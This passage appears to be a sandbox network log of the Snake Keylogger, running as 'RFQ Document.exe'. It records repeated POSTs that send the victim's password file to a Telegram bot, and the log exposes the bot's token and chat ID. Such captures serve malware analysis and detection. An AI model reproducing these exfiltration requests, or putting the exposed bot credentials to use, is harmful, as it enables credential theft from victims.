{"ok":true,"result":{"message_id":12688,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.4	49882	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:44 UTC	169	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cfc2757d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:44 UTC	170	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 63 32 37 35 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cfc2757dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:44 UTC	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:44 UTC	170	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12690,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.4	49883	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:44 UTC	171	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cfda4c26 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:44 UTC	171	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 64 61 34 63 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cfda4c26Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:44 UTC	172	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:44 UTC	172	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12691,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.4	49884	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:44 UTC	172	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cff94c71 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:44 UTC	173	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 66 39 34 63 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cff94c71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:44 UTC	173	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:44 UTC	174	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12692,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.4	49885	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:44 UTC	174	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d018a361 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:44 UTC	174	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 31 38 61 33 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d018a361Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:44 UTC	175	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:44 UTC	175	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12693,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49785	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:22 UTC	17	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c321840c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:22 UTC	17	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 32 31 38 34 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c321840cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:22 UTC	18	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:22 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:22 UTC	18	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12590,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.4	49886	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:44 UTC	176	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d02dbe7d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:44 UTC	176	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 32 64 62 65 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d02dbe7dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:44 UTC	176	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:44 UTC	177	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12694,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.4	49887	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:44 UTC	177	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d04cbcff Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:44 UTC	178	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 34 63 62 63 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d04cbcffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:45 UTC	178	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:45 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:45 UTC	178	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12695,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808725,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.4	49888	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:45 UTC	179	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d06494a7 Host: api.telegram.org Content-Length: 407
